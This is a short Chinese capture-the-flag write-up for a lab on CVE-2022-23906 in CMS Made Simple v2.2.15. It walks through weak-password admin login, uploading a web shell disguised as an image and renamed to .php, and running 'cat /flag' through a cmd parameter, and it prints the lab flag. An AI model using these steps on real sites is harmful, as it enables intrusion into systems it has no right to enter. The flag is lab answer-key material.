春秋云镜 CVE-2022-23906 CMS Made Simple v2.2.15 RCE
靶标介绍
CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
启动场景
漏洞利用
/admin进入后台管理登陆界面,admin/123456,弱口令登录。
“内容”-“File Manager” 上传图片马,上传失败,尝试绕过,失败,上传文件shell.php.jpg。
复制shell.php.jpg文件为shell.php。
http://eci-2zegg792x6hb5dh4i7jw.cloudeci1.ichunqiu.com/uploads/shell.php
执行命令,获取flag。
http://eci-2zegg792x6hb5dh4i7jw.cloudeci1.ichunqiu.com/uploads/shell.php?cmd=cat%20/flag
得到flag
flag{dd098f35-32a0-4faa-8820-03071c9ee39c}